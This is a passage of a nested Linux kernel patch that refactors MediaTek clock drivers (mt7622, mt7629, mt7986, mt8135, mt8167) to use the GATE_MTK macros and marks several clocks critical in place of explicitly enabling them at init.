++#define GATE_AUDIO1(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &audio1_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+-#define GATE_AUDIO2(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &audio2_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_AUDIO2(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &audio2_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+-#define GATE_AUDIO3(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &audio3_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_AUDIO3(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &audio3_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+ static const struct mtk_gate_regs audio0_cg_regs = {
+ 	.set_ofs = 0x0,
+diff --git a/drivers/clk/mediatek/clk-mt7622-eth.c b/drivers/clk/mediatek/clk-mt7622-eth.c
+index 43de0477d5d99..a60190e834186 100644
+--- a/drivers/clk/mediatek/clk-mt7622-eth.c
++++ b/drivers/clk/mediatek/clk-mt7622-eth.c
+@@ -16,14 +16,8 @@
+ 
+ #include <dt-bindings/clock/mt7622-clk.h>
+ 
+-#define GATE_ETH(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &eth_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_ETH(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &eth_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate_regs eth_cg_regs = {
+ 	.set_ofs = 0x30,
+@@ -45,14 +39,8 @@ static const struct mtk_gate_regs sgmii_cg_regs = {
+ 	.sta_ofs = 0xE4,
+ };
+ 
+-#define GATE_SGMII(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &sgmii_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_SGMII(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &sgmii_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate sgmii_clks[] = {
+ 	GATE_SGMII(CLK_SGMII_TX250M_EN, "sgmii_tx250m_en",
+diff --git a/drivers/clk/mediatek/clk-mt7622-hif.c b/drivers/clk/mediatek/clk-mt7622-hif.c
+index 67e96231dd25b..55baa6d06a205 100644
+--- a/drivers/clk/mediatek/clk-mt7622-hif.c
++++ b/drivers/clk/mediatek/clk-mt7622-hif.c
+@@ -16,23 +16,11 @@
+ 
+ #include <dt-bindings/clock/mt7622-clk.h>
+ 
+-#define GATE_PCIE(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &pcie_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_PCIE(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &pcie_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+-#define GATE_SSUSB(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &ssusb_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_SSUSB(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &ssusb_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate_regs pcie_cg_regs = {
+ 	.set_ofs = 0x30,
+diff --git a/drivers/clk/mediatek/clk-mt7622.c b/drivers/clk/mediatek/clk-mt7622.c
+index 3b55f8641fae0..eebbb87906930 100644
+--- a/drivers/clk/mediatek/clk-mt7622.c
++++ b/drivers/clk/mediatek/clk-mt7622.c
+@@ -50,59 +50,28 @@
+ 		 _pd_reg, _pd_shift, _tuner_reg, _pcw_reg, _pcw_shift,  \
+ 		 NULL, "clkxtal")
+ 
+-#define GATE_APMIXED(_id, _name, _parent, _shift) {			\
+-		.id = _id,						\
+-		.name = _name,						\
+-		.parent_name = _parent,					\
+-		.regs = &apmixed_cg_regs,				\
+-		.shift = _shift,					\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,			\
+-	}
++#define GATE_APMIXED_AO(_id, _name, _parent, _shift)			\
++	GATE_MTK_FLAGS(_id, _name, _parent, &apmixed_cg_regs, _shift,	\
++		 &mtk_clk_gate_ops_no_setclr_inv, CLK_IS_CRITICAL)
+ 
+-#define GATE_INFRA(_id, _name, _parent, _shift) {			\
+-		.id = _id,						\
+-		.name = _name,						\
+-		.parent_name = _parent,					\
+-		.regs = &infra_cg_regs,					\
+-		.shift = _shift,					\
+-		.ops = &mtk_clk_gate_ops_setclr,			\
+-	}
++#define GATE_INFRA(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &infra_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_TOP0(_id, _name, _parent, _shift) {			\
+-		.id = _id,						\
+-		.name = _name,						\
+-		.parent_name = _parent,					\
+-		.regs = &top0_cg_regs,					\
+-		.shift = _shift,					\
+-		.ops = &mtk_clk_gate_ops_no_setclr,			\
+-	}
++#define GATE_TOP0(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &top0_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+-#define GATE_TOP1(_id, _name, _parent, _shift) {			\
+-		.id = _id,						\
+-		.name = _name,						\
+-		.parent_name = _parent,					\
+-		.regs = &top1_cg_regs,					\
+-		.shift = _shift,					\
+-		.ops = &mtk_clk_gate_ops_no_setclr,			\
+-	}
++#define GATE_TOP1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &top1_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+-#define GATE_PERI0(_id, _name, _parent, _shift) {			\
+-		.id = _id,						\
+-		.name = _name,						\
+-		.parent_name = _parent,					\
+-		.regs = &peri0_cg_regs,					\
+-		.shift = _shift,					\
+-		.ops = &mtk_clk_gate_ops_setclr,			\
+-	}
++#define GATE_PERI0(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &peri0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_PERI1(_id, _name, _parent, _shift) {			\
+-		.id = _id,						\
+-		.name = _name,						\
+-		.parent_name = _parent,					\
+-		.regs = &peri1_cg_regs,					\
+-		.shift = _shift,					\
+-		.ops = &mtk_clk_gate_ops_setclr,			\
+-	}
++#define GATE_PERI0_AO(_id, _name, _parent, _shift)			\
++	GATE_MTK_FLAGS(_id, _name, _parent, &peri0_cg_regs, _shift,	\
++		 &mtk_clk_gate_ops_setclr, CLK_IS_CRITICAL)
++
++#define GATE_PERI1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &peri1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static DEFINE_SPINLOCK(mt7622_clk_lock);
+ 
+@@ -350,7 +319,7 @@ static const struct mtk_pll_data plls[] = {
+ };
+ 
+ static const struct mtk_gate apmixed_clks[] = {
+-	GATE_APMIXED(CLK_APMIXED_MAIN_CORE_EN, "main_core_en", "mainpll", 5),
++	GATE_APMIXED_AO(CLK_APMIXED_MAIN_CORE_EN, "main_core_en", "mainpll", 5),
+ };
+ 
+ static const struct mtk_gate infra_clks[] = {
+@@ -485,7 +454,7 @@ static const struct mtk_gate peri_clks[] = {
+ 	GATE_PERI0(CLK_PERI_AP_DMA_PD, "peri_ap_dma_pd", "axi_sel", 12),
+ 	GATE_PERI0(CLK_PERI_MSDC30_0_PD, "peri_msdc30_0", "msdc30_0_sel", 13),
+ 	GATE_PERI0(CLK_PERI_MSDC30_1_PD, "peri_msdc30_1", "msdc30_1_sel", 14),
+-	GATE_PERI0(CLK_PERI_UART0_PD, "peri_uart0_pd", "axi_sel", 17),
++	GATE_PERI0_AO(CLK_PERI_UART0_PD, "peri_uart0_pd", "axi_sel", 17),
+ 	GATE_PERI0(CLK_PERI_UART1_PD, "peri_uart1_pd", "axi_sel", 18),
+ 	GATE_PERI0(CLK_PERI_UART2_PD, "peri_uart2_pd", "axi_sel", 19),
+ 	GATE_PERI0(CLK_PERI_UART3_PD, "peri_uart3_pd", "axi_sel", 20),
+@@ -513,12 +482,12 @@ static struct mtk_composite infra_muxes[] = {
+ 
+ static struct mtk_composite top_muxes[] = {
+ 	/* CLK_CFG_0 */
+-	MUX_GATE(CLK_TOP_AXI_SEL, "axi_sel", axi_parents,
+-		 0x040, 0, 3, 7),
+-	MUX_GATE(CLK_TOP_MEM_SEL, "mem_sel", mem_parents,
+-		 0x040, 8, 1, 15),
+-	MUX_GATE(CLK_TOP_DDRPHYCFG_SEL, "ddrphycfg_sel", ddrphycfg_parents,
+-		 0x040, 16, 1, 23),
++	MUX_GATE_FLAGS(CLK_TOP_AXI_SEL, "axi_sel", axi_parents,
++		       0x040, 0, 3, 7, CLK_IS_CRITICAL),
++	MUX_GATE_FLAGS(CLK_TOP_MEM_SEL, "mem_sel", mem_parents,
++		       0x040, 8, 1, 15, CLK_IS_CRITICAL),
++	MUX_GATE_FLAGS(CLK_TOP_DDRPHYCFG_SEL, "ddrphycfg_sel", ddrphycfg_parents,
++		       0x040, 16, 1, 23, CLK_IS_CRITICAL),
+ 	MUX_GATE(CLK_TOP_ETH_SEL, "eth_sel", eth_parents,
+ 		 0x040, 24, 3, 31),
+ 
+@@ -655,10 +624,6 @@ static int mtk_topckgen_init(struct platform_device *pdev)
+ 	mtk_clk_register_gates(node, top_clks, ARRAY_SIZE(top_clks),
+ 			       clk_data);
+ 
+-	clk_prepare_enable(clk_data->hws[CLK_TOP_AXI_SEL]->clk);
+-	clk_prepare_enable(clk_data->hws[CLK_TOP_MEM_SEL]->clk);
+-	clk_prepare_enable(clk_data->hws[CLK_TOP_DDRPHYCFG_SEL]->clk);
+-
+ 	return of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ }
+ 
+@@ -701,9 +666,6 @@ static int mtk_apmixedsys_init(struct platform_device *pdev)
+ 	mtk_clk_register_gates(node, apmixed_clks,
+ 			       ARRAY_SIZE(apmixed_clks), clk_data);
+ 
+-	clk_prepare_enable(clk_data->hws[CLK_APMIXED_ARMPLL]->clk);
+-	clk_prepare_enable(clk_data->hws[CLK_APMIXED_MAIN_CORE_EN]->clk);
+-
+ 	return of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ }
+ 
+@@ -730,8 +692,6 @@ static int mtk_pericfg_init(struct platform_device *pdev)
+ 	if (r)
+ 		return r;
+ 
+-	clk_prepare_enable(clk_data->hws[CLK_PERI_UART0_PD]->clk);
+-
+ 	mtk_register_reset_controller_with_dev(&pdev->dev, &clk_rst_desc[1]);
+ 
+ 	return 0;
+diff --git a/drivers/clk/mediatek/clk-mt7629-eth.c b/drivers/clk/mediatek/clk-mt7629-eth.c
+index 282dd65594654..b0c8fa3b8bbec 100644
+--- a/drivers/clk/mediatek/clk-mt7629-eth.c
++++ b/drivers/clk/mediatek/clk-mt7629-eth.c
+@@ -16,14 +16,8 @@
+ 
+ #include <dt-bindings/clock/mt7629-clk.h>
+ 
+-#define GATE_ETH(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &eth_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_ETH(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &eth_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate_regs eth_cg_regs = {
+ 	.set_ofs = 0x30,
+@@ -45,14 +39,8 @@ static const struct mtk_gate_regs sgmii_cg_regs = {
+ 	.sta_ofs = 0xE4,
+ };
+ 
+-#define GATE_SGMII(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &sgmii_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_SGMII(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &sgmii_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate sgmii_clks[2][4] = {
+ 	{
+diff --git a/drivers/clk/mediatek/clk-mt7629-hif.c b/drivers/clk/mediatek/clk-mt7629-hif.c
+index 0c8b9e1397890..3628811a2f57f 100644
+--- a/drivers/clk/mediatek/clk-mt7629-hif.c
++++ b/drivers/clk/mediatek/clk-mt7629-hif.c
+@@ -16,23 +16,11 @@
+ 
+ #include <dt-bindings/clock/mt7629-clk.h>
+ 
+-#define GATE_PCIE(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &pcie_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_PCIE(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &pcie_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+-#define GATE_SSUSB(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &ssusb_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_SSUSB(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &ssusb_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate_regs pcie_cg_regs = {
+ 	.set_ofs = 0x30,
+diff --git a/drivers/clk/mediatek/clk-mt7629.c b/drivers/clk/mediatek/clk-mt7629.c
+index e4a08c811adc2..0bc88b7d171b5 100644
+--- a/drivers/clk/mediatek/clk-mt7629.c
++++ b/drivers/clk/mediatek/clk-mt7629.c
+@@ -50,41 +50,17 @@
+ 		_pd_reg, _pd_shift, _tuner_reg, _pcw_reg, _pcw_shift,	\
+ 		NULL, "clk20m")
+ 
+-#define GATE_APMIXED(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &apmixed_cg_regs,		\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_APMIXED(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &apmixed_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+-#define GATE_INFRA(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &infra_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_INFRA(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &infra_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_PERI0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &peri0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_PERI0(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &peri0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_PERI1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &peri1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_PERI1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &peri1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static DEFINE_SPINLOCK(mt7629_clk_lock);
+ 
+diff --git a/drivers/clk/mediatek/clk-mt7986-eth.c b/drivers/clk/mediatek/clk-mt7986-eth.c
+index 7868c0728e962..c21e1d672384a 100644
+--- a/drivers/clk/mediatek/clk-mt7986-eth.c
++++ b/drivers/clk/mediatek/clk-mt7986-eth.c
+@@ -22,12 +22,8 @@ static const struct mtk_gate_regs sgmii0_cg_regs = {
+ 	.sta_ofs = 0xe4,
+ };
+ 
+-#define GATE_SGMII0(_id, _name, _parent, _shift)                               \
+-	{                                                                      \
+-		.id = _id, .name = _name, .parent_name = _parent,              \
+-		.regs = &sgmii0_cg_regs, .shift = _shift,                      \
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,                        \
+-	}
++#define GATE_SGMII0(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &sgmii0_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate sgmii0_clks[] __initconst = {
+ 	GATE_SGMII0(CLK_SGMII0_TX250M_EN, "sgmii0_tx250m_en", "top_xtal", 2),
+@@ -42,12 +38,8 @@ static const struct mtk_gate_regs sgmii1_cg_regs = {
+ 	.sta_ofs = 0xe4,
+ };
+ 
+-#define GATE_SGMII1(_id, _name, _parent, _shift)                               \
+-	{                                                                      \
+-		.id = _id, .name = _name, .parent_name = _parent,              \
+-		.regs = &sgmii1_cg_regs, .shift = _shift,                      \
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,                        \
+-	}
++#define GATE_SGMII1(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &sgmii1_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate sgmii1_clks[] __initconst = {
+ 	GATE_SGMII1(CLK_SGMII1_TX250M_EN, "sgmii1_tx250m_en", "top_xtal", 2),
+@@ -62,12 +54,8 @@ static const struct mtk_gate_regs eth_cg_regs = {
+ 	.sta_ofs = 0x30,
+ };
+ 
+-#define GATE_ETH(_id, _name, _parent, _shift)                                  \
+-	{                                                                      \
+-		.id = _id, .name = _name, .parent_name = _parent,              \
+-		.regs = &eth_cg_regs, .shift = _shift,                         \
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,                        \
+-	}
++#define GATE_ETH(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &eth_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate eth_clks[] __initconst = {
+ 	GATE_ETH(CLK_ETH_FE_EN, "eth_fe_en", "netsys_2x_sel", 6),
+diff --git a/drivers/clk/mediatek/clk-mt7986-infracfg.c b/drivers/clk/mediatek/clk-mt7986-infracfg.c
+index 49666047bf0ed..74e68a7197301 100644
+--- a/drivers/clk/mediatek/clk-mt7986-infracfg.c
++++ b/drivers/clk/mediatek/clk-mt7986-infracfg.c
+@@ -87,26 +87,14 @@ static const struct mtk_gate_regs infra2_cg_regs = {
+ 	.sta_ofs = 0x68,
+ };
+ 
+-#define GATE_INFRA0(_id, _name, _parent, _shift)                               \
+-	{                                                                      \
+-		.id = _id, .name = _name, .parent_name = _parent,              \
+-		.regs = &infra0_cg_regs, .shift = _shift,                      \
+-		.ops = &mtk_clk_gate_ops_setclr,                               \
+-	}
++#define GATE_INFRA0(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &infra0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_INFRA1(_id, _name, _parent, _shift)                               \
+-	{                                                                      \
+-		.id = _id, .name = _name, .parent_name = _parent,              \
+-		.regs = &infra1_cg_regs, .shift = _shift,                      \
+-		.ops = &mtk_clk_gate_ops_setclr,                               \
+-	}
++#define GATE_INFRA1(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &infra1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_INFRA2(_id, _name, _parent, _shift)                               \
+-	{                                                                      \
+-		.id = _id, .name = _name, .parent_name = _parent,              \
+-		.regs = &infra2_cg_regs, .shift = _shift,                      \
+-		.ops = &mtk_clk_gate_ops_setclr,                               \
+-	}
++#define GATE_INFRA2(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &infra2_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate infra_clks[] = {
+ 	/* INFRA0 */
+diff --git a/drivers/clk/mediatek/clk-mt8135.c b/drivers/clk/mediatek/clk-mt8135.c
+index b68888a034c40..3ea06d2ec2f11 100644
+--- a/drivers/clk/mediatek/clk-mt8135.c
++++ b/drivers/clk/mediatek/clk-mt8135.c
+@@ -2,6 +2,8 @@
+ /*
+  * Copyright (c) 2014 MediaTek Inc.
+  * Author: James Liao <jamesjj.liao@mediatek.com>
++ * Copyright (c) 2023 Collabora, Ltd.
++ *               AngeloGioacchino Del Regno <angelogioacchino.delregno@collabora.com>
+  */
+ 
+ #include <linux/clk.h>
+@@ -390,7 +392,7 @@ static const struct mtk_composite top_muxes[] __initconst = {
+ 	MUX_GATE(CLK_TOP_GCPU_SEL, "gcpu_sel", gcpu_parents, 0x0164, 24, 3, 31),
+ 	/* CLK_CFG_9 */
+ 	MUX_GATE(CLK_TOP_DPI1_SEL, "dpi1_sel", dpi1_parents, 0x0168, 0, 2, 7),
+-	MUX_GATE(CLK_TOP_CCI_SEL, "cci_sel", cci_parents, 0x0168, 8, 3, 15),
++	MUX_GATE_FLAGS(CLK_TOP_CCI_SEL, "cci_sel", cci_parents, 0x0168, 8, 3, 15, CLK_IS_CRITICAL),
+ 	MUX_GATE(CLK_TOP_APLL_SEL, "apll_sel", apll_parents, 0x0168, 16, 3, 23),
+ 	MUX_GATE(CLK_TOP_HDMIPLL_SEL, "hdmipll_sel", hdmipll_parents, 0x0168, 24, 2, 31),
+ };
+@@ -401,14 +403,12 @@ static const struct mtk_gate_regs infra_cg_regs = {
+ 	.sta_ofs = 0x0048,
+ };
+ 
+-#define GATE_ICG(_id, _name, _parent, _shift) {	\
+-		.id = _id,					\
+-		.name = _name,					\
+-		.parent_name = _parent,				\
+-		.regs = &infra_cg_regs,				\
+-		.shift = _shift,				\
+-		.ops = &mtk_clk_gate_ops_setclr,		\
+-	}
++#define GATE_ICG(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &infra_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
++
++#define GATE_ICG_AO(_id, _name, _parent, _shift)	\
++	GATE_MTK_FLAGS(_id, _name, _parent, &infra_cg_regs, _shift,	\
++		       &mtk_clk_gate_ops_setclr, CLK_IS_CRITICAL)
+ 
+ static const struct mtk_gate infra_clks[] __initconst = {
+ 	GATE_ICG(CLK_INFRA_PMIC_WRAP, "pmic_wrap_ck", "axi_sel", 23),
+@@ -417,7 +417,7 @@ static const struct mtk_gate infra_clks[] __initconst = {
+ 	GATE_ICG(CLK_INFRA_CCIF0_AP_CTRL, "ccif0_ap_ctrl", "axi_sel", 20),
+ 	GATE_ICG(CLK_INFRA_KP, "kp_ck", "axi_sel", 16),
+ 	GATE_ICG(CLK_INFRA_CPUM, "cpum_ck", "cpum_tck_in", 15),
+-	GATE_ICG(CLK_INFRA_M4U, "m4u_ck", "mem_sel", 8),
++	GATE_ICG_AO(CLK_INFRA_M4U, "m4u_ck", "mem_sel", 8),
+ 	GATE_ICG(CLK_INFRA_MFGAXI, "mfgaxi_ck", "axi_sel", 7),
+ 	GATE_ICG(CLK_INFRA_DEVAPC, "devapc_ck", "axi_sel", 6),
+ 	GATE_ICG(CLK_INFRA_AUDIO, "audio_ck", "aud_intbus_sel", 5),
+@@ -438,23 +438,11 @@ static const struct mtk_gate_regs peri1_cg_regs = {
+ 	.sta_ofs = 0x001c,
+ };
+ 
+-#define GATE_PERI0(_id, _name, _parent, _shift) {	\
+-		.id = _id,					\
+-		.name = _name,					\
+-		.parent_name = _parent,				\
+-		.regs = &peri0_cg_regs,				\
+-		.shift = _shift,				\
+-		.ops = &mtk_clk_gate_ops_setclr,		\
+-	}
++#define GATE_PERI0(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &peri0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_PERI1(_id, _name, _parent, _shift) {	\
+-		.id = _id,					\
+-		.name = _name,					\
+-		.parent_name = _parent,				\
+-		.regs = &peri1_cg_regs,				\
+-		.shift = _shift,				\
+-		.ops = &mtk_clk_gate_ops_setclr,		\
+-	}
++#define GATE_PERI1(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &peri1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate peri_gates[] __initconst = {
+ 	/* PERI0 */
+@@ -551,8 +539,6 @@ static void __init mtk_topckgen_init(struct device_node *node)
+ 	mtk_clk_register_composites(top_muxes, ARRAY_SIZE(top_muxes), base,
+ 			&mt8135_clk_lock, clk_data);
+ 
+-	clk_prepare_enable(clk_data->hws[CLK_TOP_CCI_SEL]->clk);
+-
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+ 		pr_err("%s(): could not register clock provider: %d\n",
+@@ -570,8 +556,6 @@ static void __init mtk_infrasys_init(struct device_node *node)
+ 	mtk_clk_register_gates(node, infra_clks, ARRAY_SIZE(infra_clks),
+ 						clk_data);
+ 
+-	clk_prepare_enable(clk_data->hws[CLK_INFRA_M4U]->clk);
+-
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+ 		pr_err("%s(): could not register clock provider: %d\n",
+diff --git a/drivers/clk/mediatek/clk-mt8167-aud.c b/drivers/clk/mediatek/clk-mt8167-aud.c
+index ce1ae8d243c33..b5ac196cd9454 100644
+--- a/drivers/clk/mediatek/clk-mt8167-aud.c
++++ b/drivers/clk/mediatek/clk-mt8167-aud.c
+@@ -23,14 +23,9 @@ static const struct mtk_gate_regs aud_cg_regs = {
+ 	.sta_ofs = 0x0,
+ };
+ 
+-#define GATE_AUD(_id, _name, _parent, _shift) {	\
+-		.id = _id,			\
+-		.name = _name,			\
+-		.parent_name = _parent,		\
+-		.regs = &aud_cg_regs,		\
+-		.shift = _shift,		\
+-		.ops = &mtk_clk_gate_ops_no_setclr,		\
+-	}
++#define GATE_AUD(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &aud_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
++
+ 
+ static const struct mtk_gate aud_clks[] __initconst = {
+ 	GATE_AUD(CLK_AUD_AFE, "aud_afe", "clk26m_ck", 2),
+diff --git a/drivers/clk/mediatek/clk-mt8167-img.c b/drivers/clk/mediatek/clk-mt8167-img.c
+index e359e563d2b79..4e7c0772b4f99 100644
+--- a/drivers/clk/mediatek/clk-mt8167-img.c
++++ b/drivers/clk/mediatek/clk-mt8167-img.c
+@@ -23,14 +23,8 @@ static const struct mtk_gate_regs img_cg_regs = {
+ 	.sta_ofs = 0x0,
+ };
+ 
+-#define GATE_IMG(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &img_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_IMG(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &img_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate img_clks[] __initconst = {
+ 	GATE_IMG(CLK_IMG_LARB1_SMI, "img_larb1_smi", "smi_mm", 0),
+diff --git a/drivers/clk/mediatek/clk-mt8167-mfgcfg.c b/drivers/clk/mediatek/clk-mt8167-mfgcfg.c
+index 4fd82fe87d6e5..192714498b2ec 100644
+--- a/drivers/clk/mediatek/clk-mt8167-mfgcfg.c
++++ b/drivers/clk/mediatek/clk-mt8167-mfgcfg.c
+@@ -23,14 +23,8 @@ static const struct mtk_gate_regs mfg_cg_regs = {
+ 	.sta_ofs = 0x0,
+ };
+ 
+-#define GATE_MFG(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &mfg_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_MFG(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &mfg_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate mfg_clks[] __initconst = {
+ 	GATE_MFG(CLK_MFG_BAXI, "mfg_baxi", "ahb_infra_sel", 0),
